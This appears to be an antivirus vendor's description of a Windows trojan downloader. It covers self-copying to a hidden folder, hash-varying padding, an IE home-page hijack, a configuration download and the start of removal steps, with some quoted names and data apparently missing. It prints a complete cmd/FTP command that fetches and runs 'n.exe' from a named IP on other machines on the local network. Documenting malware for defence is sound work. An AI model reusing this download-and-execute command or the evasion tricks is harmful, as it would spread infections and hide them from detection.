A trojan program that installs and launches other software on the infected computer without the user's knowledge. It is a Windows application (PE EXE-file). 25169 bytes. The program is packed by an unknown packer. Its unpacked size is around 74 kB. Written in C++.
Payload
If the path to the trojan file does not contain the character sequence "ommon", the trojan retrieves a script from its body and launches it under the following name:
<rnd> is a sequence of three random Latin letters, for example, "YSQ".
This file is 803 bytes and is detected by Kaspersky Antivirus as Trojan.VBS.StartPage.hw.
Launching this script changes the default home page and search page of the Internet Explorer browser by writing the following data to the system registry key:
The trojan then creates a copy of its file under the name "coiome.exe" and deletes its original file:
%ProgramFiles%\Common Files\sebsbvx\coiome.exe
The creation date of the copy is set to "17.08.2009", and the directory containing the trojan copy is given the "hidden" and "system" attributes:
%ProgramFiles%\Common Files\sebsbvx
When creating a copy of itself, the trojan may append a random sequence of characters to the file so that the hash of each copy differs. The trojan may also append a run of "2" characters to the file, thus increasing the size of its copy.
The trojan then launches its copy and shuts down.
The trojan downloads the file from the following URL:
http://j.q***800.com/b.jpg
and saves the downloaded file under the following name:
%WinDir%\Fonts\oh.ini
This file is a configuration file and is used further by the trojan.
Using the system file:
%System%\sc.exe
it automatically launches services with the following names:
The trojan retrieves the following file from its body:
%WinDir%\Tasks\<rnd2>i.vbe
<rnd2> is a sequence of 3 random Latin letters.
This file is 2117 bytes. It is an auxiliary file used in the trojan's subsequent operation.
It then extracts the following file from its body:
%WinDir%\Tasks\<rnd3>e.exe
<rnd3> is a sequence of 3 random Latin letters, for example, "DNP".
This file is detected by Kaspersky Antivirus as Exploit.Win32.IMG-WMF.fk.
The trojan writes the running time of the user's computer into the extracted file so that its hash differs each time it is created. It may also append a run of "0" bytes to the file, so that its size may differ from the base size of 3748 bytes.
The trojan determines the IP-address of the user's computer and then reads and deciphers the previously retrieved configuration file named:
%WinDir%\Fonts\oh.ini
From this file the trojan obtains one of the following parameters, which it uses when launching the file:
<parameter1> - IP address (the trojan enumerates the IP addresses of the local network on which the infected computer is located)
<parameter2> - deciphered URL, received from the configuration file.
At the time this description was written, the configuration file contained the following link:
http://dh***88.org/p/mi.exe (32891 bytes, detected by Kaspersky Antivirus as Trojan-Downloader.Win32.Geral.adeh)
It then runs a command of the following form:
%System%\cscript.exe %WinDir%\Tasks\<rnd2>i.vbe <IP-address of the attacked computer> administrator "" "cmd /c @echo open 61.129.51.245>>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get n.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del b.dat&n.exe&n.exe&del n.exe"
In this way the trojan attempts to download the file "n.exe" from the FTP server and launch it on the attacked computer. After a successful launch, it deletes this file.
Before shutting down, it deletes the following file:
%ProgramFiles%\<rnd2>.hta
Removal instructions
If your computer has not been protected with anti-virus software and has been infected with this malware, take the following steps to remove it:
Delete the original trojan file (its location on the infected computer will depend on how the program got onto the computer).
Using Task Manager, end the trojan process:
coiome.exe